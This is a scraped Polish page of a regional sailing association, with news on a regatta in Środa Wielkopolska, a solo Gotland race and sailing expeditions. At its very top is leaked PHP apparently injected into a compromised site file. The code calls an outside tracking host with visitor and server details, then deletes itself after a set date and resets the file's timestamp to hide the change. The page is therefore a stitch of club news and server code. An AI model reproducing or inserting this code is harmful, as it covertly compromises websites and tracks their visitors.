check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Artykuły

Witamy na pozz.poznan.pl stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Artykuły

IV Ogólnopolskie Regaty o Puchar Trenera UKŻ „Środa” 

12.09.2015

Czwarte Ogólnopolskie Regaty o Puchar Trenera UKŻ „Środa” przeszły do historii jako najliczniejsze dotychczas żeglarskie zawody sportowe rozegrane w Środzie Wielkopolskiej. Czterdziestu żeglarzy z czterech klubów żeglarskich walczyło o tytuły w trakcie trzech rozegranych wyścigów w klasie Optimist do lat 15 i Open (wszystkie pozostałe klasy jachtów). Zawodnikom kibicowali na brzegu licznie przybyli miłośnicy żeglarstwa oraz osoby towarzyszace.

IV Ogólnopolskie Regaty o Puchar Trenera UKŻ Środa

Na zorganizowanych przez Uczniowski Klub Żeglarski „Środa” regatach dopisała pogoda oraz prawdziwie żeglarska atmosfera. Słabnący wiatr dostarczył dodatkowych emocji na trasie regat. W każdym wyścigu, i w klasie Optimist i Open, dochodziło do ciekawych pojedynków oraz walki w większych grupach. Nad prawidłowym przebiegiem zawodów czuwał sędzia główny regat i gość specjalny imprezy Krzysztof Kwaśniewski. Całe widowisko na wodzie wzbogacono o komentarz tytularnego trenera – Patryka Różańskiego. Widzowie mogli dzięki temu zrozumieć na czym polegają regaty i poznać sylwetki startujących zawodników.

Więcej…

 

Z przyjemnością przesyłam relacje autorstwa Wielkopolanina i Poznaniaka kpt. Witka Małeckiego z jego udziału w samotnych regatach Bitwa o Gotland, gdzie pomimo wielu przeciwności losu i złej pogody ukończył regaty zajmując wysokie czwarte miejsce w klasie ORC 2. Aktualności i wyniki: http://bitwaogotland.pl/
Bitwa o Gotland 2015

Zachęcam także do udziału w spotkaniu żeglarskim, które będzie poświęcone samotnej żegludze kpt. Witka Małeckiego
sala Wielkopolskiego Okręgowego Związku Żeglarskiego
ul. Wodna 8/9, Poznań
08.10.2015 (czwartek) start godz. 19:00

Serdecznie zapraszam i zachęcam do publikowania informacji o regatach Bitwa o Gotland,
Pozdrawiam serdecznie,
Tomasz Adamczyk

Więcej…

 

Prezentujemy relację autorstwa Justyny Małeckiej z III-ego etapu Wyprawy Shackelton 2014, prowadzonego przez kpt. Witka Małeckiego.

Serdecznie zapraszamy!

fot. Justyna Małecka

fot. Leszek Kordys

 

Więcej…

 

Relacja VII etap wyprawy Lodowe Krainy 2014

Galeria zdjęć > >> VII etap wyprawy Lodowe Krainy 2014

Termin: 26.09-10.10.2014
Trasa: Bodo, Svartisen, Sandnessjoeen, Sandnessjoeen, Rorvik, Molde, Alesund, Molde, Floro, Bergen
Podczas rejsu przebyto:
711 Mil morskich
175 godzin (65 h żagle, 110 silnik)
153 godziny postoju

Więcej…

 

II etap wyprawy POLONUSA, zakończony, zostały nam tylko wspomnienia.

Galeria zdjęć II etap wyprawy s/y Polonusa - Shackleton 2014 

Spędziliśmy 15 dni na pokładzie starego, dobrego i dzielnego jachtu. Do Lizbony przyjechaliśmy 2 dni wcześniej a ON już czekał. Pełen tajemnic, nieoczekiwanych patentów i procedur. Całe szczęście, że Seba został z nami gdyż po 4 miesiącach wiedział już o NIM wszystko. My, załoga POSNANII zapakowaliśmy się na JEGO pokład po raz pierwszy i cierpliwie wysłuchaliśmy co, jak, gdzie i kiedy, poczym wypłynęliśmy na ocean. Nocne wyjście z Lizbony trochę nerwowe gdyż wiatr niekorzystny, dość silne prądy spychające na mielizny, no i pierwsze stawianie żagli. Dalej już jak po sznurku. Do Kadyksu (230 mil) z planem zdobycia Gibraltaru. Uniemożliwiły to jednak słabe wiatry i obawa, że nie zdążymy.  Natomiast Cadiz super - wart poznania. Cudowne miejsce. Ładna marina, piękny nadmorski bulwar no i oczywiście stare miasto z uliczkami, knajpkami, i targiem gdzie uzupełniliśmy zaopatrzenie. Wielkie steki z tuńczyka ucieszyły nasze oko i żołądki. Polecam.

Więcej…

 
Więcej artykułów…

Poznań Know How

Energa Sailing

Przeszukaj nasz serwis